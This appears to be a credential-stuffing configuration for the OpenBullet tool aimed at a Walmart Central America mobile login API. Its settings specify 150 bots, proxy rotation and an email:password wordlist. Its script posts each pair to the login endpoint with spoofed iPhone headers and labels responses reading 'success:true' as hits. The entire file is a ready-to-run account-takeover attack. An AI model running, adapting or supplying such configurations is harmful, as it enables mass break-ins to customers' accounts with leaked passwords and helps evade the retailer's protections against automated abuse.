[SETTINGS]
{
  "Name": "Walmart MX",
  "SuggestedBots": 150,
  "MaxCPM": 0,
  "LastModified": "2022-03-07T08:55:30.7706555+04:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "🔥 YASHVIRGAMING#7131 🔥",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://centroamerica.walmart.com/api-proxy/service/mobilecam/pricing/v1/DespachoD/Authlogin?" 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: centroamerica.walmart.com" 
  HEADER "Accept: */*" 
  HEADER "Origin: ionic://localhost" 
  HEADER "Access-Control-Request-Method: POST" 
  HEADER "Content-Length: 0" 
  HEADER "Access-Control-Request-Headers: content-type" 
  HEADER "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 15_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148" 
  HEADER "Accept-Language: en-CA,en-US;q=0.9,en;q=0.8" 
  HEADER "Accept-Encoding: gzip, deflate" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "{\"success\":false" 
  KEYCHAIN Success OR 
    KEY "{\"success\":true" 

